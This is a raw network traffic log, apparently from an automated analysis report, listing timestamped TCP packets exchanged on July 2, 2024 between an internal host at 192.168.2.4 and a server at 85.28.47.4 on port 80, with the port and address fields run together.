                                            Jul 2, 2024 08:26:28.931806087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.931818962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.931830883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.931832075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.931879997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932014942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932025909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932038069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932049036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932070971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932085991 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932156086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932168961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932204962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932284117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932296991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932310104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932321072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932331085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932332039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932344913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932357073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932357073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932384968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932396889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932624102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932676077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932771921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932784081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932794094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932812929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932816982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932826042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932836056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932838917 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932846069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932857990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932862997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932868958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932879925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932888985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932893991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.932907104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.932938099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.933201075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933249950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.933362961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933376074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933387041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933398008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933408976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933414936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.933420897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933433056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933437109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.933444977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933454990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933458090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.933466911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933470011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.933479071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.933497906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.933523893 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934031010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934042931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934056997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934068918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934079885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934082031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934091091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934096098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934103012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934113979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934117079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934124947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934135914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934148073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934158087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934163094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934163094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934169054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934182882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934201956 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934691906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934704065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934715033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934735060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934746981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934751034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934757948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934766054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934770107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934781075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934784889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934792042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934803963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934813023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934815884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934827089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934828997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934839964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934851885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934853077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934864044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934870958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934875011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934887886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934894085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934899092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.934917927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.934937000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935655117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935667038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935683966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935694933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935710907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935712099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935717106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935720921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935723066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935729027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935730934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935743093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935745001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935756922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935767889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935769081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935782909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935794115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935795069 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935805082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935812950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935817003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935827971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935833931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935839891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.935854912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.935877085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936649084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936661005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936666012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936674118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936678886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936685085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936696053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936707020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936717987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936728001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936728954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936741114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936752081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936755896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936763048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936774969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936774969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936786890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936788082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936799049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936810017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936813116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936830044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:28.936837912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936856985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:28.936878920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.021612883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021641970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021652937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021723986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021733046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.021735907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021750927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.021781921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.021863937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021876097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021887064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021898985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021904945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.021910906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.021945000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022115946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022135019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022146940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022147894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022160053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022187948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022373915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022386074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022397041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022408009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022418022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022419930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022428989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022433996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022442102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022453070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022455931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022464037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022475004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022488117 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022488117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022500038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.022505999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022522926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.022545099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023089886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023101091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023112059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023122072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023133993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023144007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023154974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023154974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023165941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023169994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023178101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023188114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023199081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023199081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023210049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023210049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023232937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023233891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023246050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023252010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023257017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023268938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023274899 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023281097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.023300886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.023324013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.024034023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024053097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024064064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024075031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024080992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024084091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.024086952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024092913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024097919 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024104118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024104118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.024108887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024115086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024120092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024125099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024131060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024141073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024146080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024152040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024158001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024162054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.024189949 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.024218082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025015116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025026083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025037050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025047064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025058031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025068045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025068998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025080919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025084972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025095940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025099993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025105953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025115967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025125980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025127888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025139093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025151014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025158882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025168896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025168896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025180101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025190115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025191069 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025201082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025212049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025216103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025223017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.025234938 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025259972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.025989056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026000023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026010990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026027918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026037931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026041985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026048899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026050091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026058912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026070118 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026077986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026081085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026092052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026099920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026103020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026113987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026118994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026124954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026135921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026138067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026146889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026149988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026156902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026169062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026175022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026180029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026201010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026218891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026868105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026880026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026892900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026904106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026915073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026917934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026926994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026928902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026937962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026948929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026954889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026961088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026977062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.026978016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026990891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.026993990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.027020931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.027039051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110189915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110204935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110217094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110256910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110287905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110335112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110347986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110382080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110413074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110424042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110435963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110447884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110455036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110481977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110505104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.110680103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110692024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110702038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110713005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.110724926 CEST6388080192.168.2.485.28.47.4
